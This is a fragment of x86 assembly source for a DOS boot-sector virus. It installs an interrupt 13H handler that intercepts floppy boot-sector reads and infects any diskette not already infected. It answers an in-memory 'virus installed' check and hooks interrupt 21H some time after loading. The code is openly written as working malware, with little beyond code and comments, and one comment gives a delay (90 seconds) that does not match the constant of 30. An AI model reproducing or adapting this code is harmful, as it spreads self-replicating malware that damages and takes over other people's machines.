;*******************************************************************************
;* INTERRUPT 13H HANDLER *
;*******************************************************************************

OLD_13H DD      ?                       ;Old interrupt 13H vector goes here

INT_13H:
        call    INT_21H_HOOKER          ;Hook interrupt 21H if it's time
        sti
        cmp     ah,2                    ;we want to intercept reads
        jz      READ_FUNCTION
        cmp     ax,75A9H                ;check for virus installed in RAM

        jnz     I13R                    ;not check, pass to original handler
        clc                             ;else return with carry cleared
        retf    2
I13R:   jmp     DWORD PTR cs:[OLD_13H]

;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 2.
;If an attempt is made to read the boot sector on the floppy, and
;the motor is off, this routine checks to see if the floppy has
;already been infected, and if not, it goes ahead and infects it.
;
READ_FUNCTION:                                  ;Disk Read Function Handler
        cmp     dh,0                            ;is it head 0?
        jnz     I13R                            ;nope, let BIOS handle it
        cmp     cx,1                            ;is it track 0, sector 1?
        jnz     I13R                            ;no, let BIOS handle it
        cmp     dl,80H                          ;no, is it hard drive c:?
        jz      I13R                            ;yes, let BIOS handle it
        mov     cs:[CURR_DISK],dl               ;save currently accessed drive #
        call    CHECK_DISK                      ;is floppy already infected?
        jz      I13R                            ;yes, pass control to BIOS
        call    INIT_FAT_MANAGER                ;initialize FAT mgmt routines
        call    INFECT_FLOPPY                   ;no, go infect the diskette
        jmp     I13R



;The following routine hooks interrupt 21H when DOS installs. The Interrupt 21H
;hook itself is in the INT21H.ASM module. This routine actually hooks the
;interrupt when it sees that the segment for the Int 21H vector is greater than
;70H, and when it hasn't already hooked it.

DELAYCNT        EQU     30                      ;time before hooking, in seconds

INT_21H_HOOKER:
        cmp     cs:[HOOK21],1                   ;already hooked?
        je      I21HR                           ;yes, don't hook twice
        push    es
        push    ds
        push    si
        push    di
        push    dx
        push    ax
        push    cs
        pop     es
        xor     ax,ax
        mov     ds,ax
        mov     si,46CH
        mov     ax,WORD PTR [si]
        mov     dx,WORD PTR [si+2]
        sub     dx,WORD PTR cs:[LOAD_TIME+2]
        sbb     ax,WORD PTR cs:[LOAD_TIME]
        cmp     ax,18*DELAYCNT                  ;90 seconds after load?
        jl      I21HX                           ;not yet, just exit
        mov     si,84H                          ;else go hook it
        mov     ax,[si+2]                       ;get int 21H vector segment
        mov     di,OFFSET OLD_21H
        movsw                                   ;set up OLD_21H
        movsw
        mov     [si-4],OFFSET INT_21H           ;set new INT 21H vector
        mov     [si-2],cs
        mov     cs:[HOOK21],1
I21HX: pop      ax
        pop     dx
        pop     di
        pop     si
        pop     ds
        pop     es
I21HR: ret

HOOK21 DB       0                       ;flag to see if 21H already hooked 1=yes